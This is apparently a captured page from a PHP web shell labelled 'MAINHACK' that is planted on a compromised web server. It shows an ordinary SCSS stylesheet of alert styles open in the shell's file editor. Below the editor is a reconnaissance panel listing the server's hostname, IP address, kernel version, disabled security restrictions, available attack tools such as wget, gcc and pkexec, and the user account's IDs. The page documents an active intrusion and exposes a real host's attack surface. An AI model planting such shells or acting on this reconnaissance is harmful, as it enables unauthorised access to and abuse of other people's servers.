[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: _alert.scss
.alert-wrapper { background-color: #fff; .alert { padding: 0 0; .alert-heading { font-weight: 600; font-size: 1rem; padding: 0.71rem 1rem; display: flex; justify-content: space-between; align-items: center; margin-bottom: 0; } .btn-close { padding: 13px 15px !important; outline: none; box-shadow: none; top: 50%; transform: translateY(-50%); transition: all 0.3s; } .alert-body { padding: 20px 14px; p { margin: 0; font-weight: 500; } } } } /* Alert Dark */ .alert-dark { background: rgba(75, 75, 75, 0.12) !important; border-color: transparent; .alert-heading, .alert-body { color: #4b4b4b !important; } .alert-heading { box-shadow: rgba(75, 75, 75, 0.4) 0 6px 15px -7px; } .alert-link { color: #3e3e3e !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%234b4b4b'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #4b4b4b !important; } } /* Alert Primary */ .alert-primary { background: rgba(115, 103, 240, 0.12) !important; border-color: transparent; .alert-heading, .alert-body { color: #8b5cf6 !important; } .alert-heading { box-shadow: rgba(115, 103, 240, 0.4) 0 6px 15px -7px; } .alert-link { color: #5e50ee !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%237367f0'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #8b5cf6 !important; } } /* Alert Secondary */ .alert-secondary { background: rgba(130, 134, 139, 0.12) !important; border-color: transparent; .alert-heading, .alert-body { color: #82868b !important; } .alert-heading { box-shadow: rgba(130, 134, 139, 0.4) 0 6px 15px -7px; } .alert-link { color: #75797e !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%2382868b'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #82868b !important; } } /* Alert Success */ .alert-success { background: #f0fbea !important; border-color: transparent; .alert-heading, .alert-body { color: #5ABF35 !important; border-left: 3px solid #5ABF35; border-radius: 8px; } .alert-heading { box-shadow: #f0fbea; } .alert-link { color: #5ABF35 !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%235ABF35 '%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #5ABF35 !important; } } /* Alert Info */ .alert-info { background: rgba(0, 207, 232, 0.12) !important; border-color: transparent; .alert-heading, .alert-body { color: #00cfe8 !important; } .alert-heading { box-shadow: rgba(0, 207, 232, 0.4) 0 6px 15px -7px; } .alert-link { color: #00b8cf !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%2300cfe8'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #00cfe8 !important; } } /* Alert Warning */ .alert-warning { background: #fffbeb !important; border-color: transparent; .alert-heading, .alert-body { color: #ffba1c !important; } .alert-heading { box-shadow: #fffbeb; } .alert-link { color: #ff922a !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23ffba1c'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #ffba1c !important; } } /* Alert Danger */ .alert-danger { background: #fff2f1 !important; border-color: transparent; color: #ff503d !important; border-left: 3px solid #f51111; border-radius: 8px; .alert-heading { box-shadow: #fff2f1; } .alert-link { color: #ff503d !important; } .btn-close { background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23ff503d'%3e%3cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3e%3c/svg%3e") center/.75rem auto no-repeat; color: #ff503d !important; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.76 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002